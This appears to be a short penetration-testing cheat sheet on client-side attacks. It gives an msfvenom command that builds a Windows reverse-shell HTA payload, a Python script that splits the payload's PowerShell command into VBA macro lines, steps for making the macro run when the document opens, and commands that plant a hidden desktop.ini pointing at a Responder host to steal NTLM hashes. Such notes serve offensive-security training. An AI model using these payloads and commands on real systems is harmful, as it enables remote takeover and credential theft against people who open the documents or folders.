# Client-Side
### Macro
* Refer to pg/hepet

* Generate the payload
`msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=443 -f hta-psh -o evil.hta`


# VBA has a 255-character limit for literal strings, but this restriction does not apply to strings stored in variables.

--- 
python script to split the payload in 255-char lines
```python
#!/usr/bin/env python3
import re

hta_file = 'evil.hta'
payload_pattern = '"(powershell.exe .*?)"'
with open(hta_file, 'r') as f:
    content = f.read()

payload = re.findall(payload_pattern, content)[0]
lpayload = len(payload)
n = 50

for i in range (0, lpayload, n):
    chunk = payload[i:i+n]
    print(f'Str = Str + "{chunk}"')
```
---



---
To assigne macro to the document:
1. Create macro
2. quit macro page
3. in workbook ->
4. Tools -> Customize -> Events -> Open document


---
https://github.com/Greenwolf/ntlm_theft



---
* Evil desktop.ini to collect hashes
mkdir secrets
attrib +s secrets
cd secrets
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\responder.local\poc >> desktop.ini
attrib +s +h desktop.ini

---